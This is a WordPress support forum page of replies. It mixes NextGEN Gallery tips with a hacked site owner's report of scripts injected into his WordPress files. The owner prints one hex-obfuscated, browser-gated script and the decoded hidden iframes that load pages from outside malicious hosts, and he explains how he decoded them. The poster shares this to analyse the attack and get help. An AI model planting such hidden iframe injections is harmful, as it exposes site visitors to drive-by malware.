Forum Replies Created

Viewing 7 replies - 31 through 37 (of 37 total)
  • The hierarchy of Nextgen is this (from top to down):

    1) Album
    2) Gallery
    3) Images

    Descriptions are properties of images, not albums, and are entered via this path: Gallery –> [Gallery Title] –> [Alt & Title Text / Description]

    Happy editing!

    Anna,

    This was great input!

    Is it possible to set it to unlimited or is a specific value required?

    Hi all,

    This problem is somewhat related to this post (except for the sorting issue)?

    And the possible solution I found could be this one?
    https://www.soulrinse.com/soulblog/how-to-create-a-nextgen-gallery-tag-cloud

    Could this be the solution you’re looking for? I haven’t checked it myself but it seems as the post is written by the one who actually made the site you’re linking to.

    https://www.soulrinse.com/soulblog/how-to-create-a-nextgen-gallery-tag-cloud

    Thread Starter mr_swede

    (@mr_swede)

    and these issues are addressed, over and over and over on these forums.

    Thanks for your patience – I’ve read many of your answers and I’m impressed by your way of dealing with people like me over and over again.

    One problem of not being a pro is that it’s difficult to see patterns when other people address related issues. I – of course stupidly – thought that my issues are unique, which they of course aren’t.

    A funny – and scary – thing is that I just logged on to my site, changed all passwords and literally saw files being changed as I was logged on. More scripts were inserted into other wp files.

    I will read through the forums again, change passwords once again, upgrade and hope for the best.

    Thread Starter mr_swede

    (@mr_swede)

    judging by this admission, it could be anything.

    This was just about what my hosting partner one.com told me as well. The problem is that I don’t know what has happened and I therefor don’t know what to do to avoid this again.

    I’m using version 2.6, and I already have searched the forums – both here and elsewhere – without having found someone else addressing these issues.

    Thread Starter mr_swede

    (@mr_swede)

    After some more googling I finally found out how to decipher the scripts above. I’m a totally newbie to scripts, so bear with me if my how-to isn’t nerdy enough…

    Just replace all document.write(txt) with document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>");

    Thanks to the original author.

    Then save the file as .html and run it in your browser. Make sure that scripts are allowed. Having changed the scripts according to the advice above make the scripts totally harmless, so you can load the file in IE. I failed to load them in Firefox.

    Now, the scripts above look like this after deciphering:

    class-smtp.html

    This is how the first script looks like after making the change described above…just so that you see the change of document.write.

    <html>
    <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6B756E2D6C616E642E68752F63642F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write("<textarea rows=50 cols=50>");document.write(unescape(o));document.write("</textarea>")}</script>
    </html>

    How it looks like in IE
    <iframe src="https://www.kun-land.hu/cd/z/static.php" height="2" style="display:none" width="2"></iframe>

    post.html
    This is the iframe hidden in the script.
    <iframe src="https://lezhunter.com/st/css/z/static.php" height="2" style="display:none" width="2"></iframe>

    query.html

    IE result:
    <iframe src="https://www.porngalleriesz.com/st/z/static.php" height="2" style="display:none" width="2"></iframe>

    feed-rss2-comments.html

    IE result:
    <iframe src="https://lezhunter.com/st/css/z/static.php" height="2" style="display:none" width="2"></iframe>

    I still really need to know how all this happened to me. Anyone out there than can shed some light on this?

    I removed all the files above from my site since I faced google blacklisting last time this happened. However, now I can’t access my site and login as wp-admin. Anyone who can suggest me how to get back in so that I can upgrade without having to delete everything?

Viewing 7 replies - 31 through 37 (of 37 total)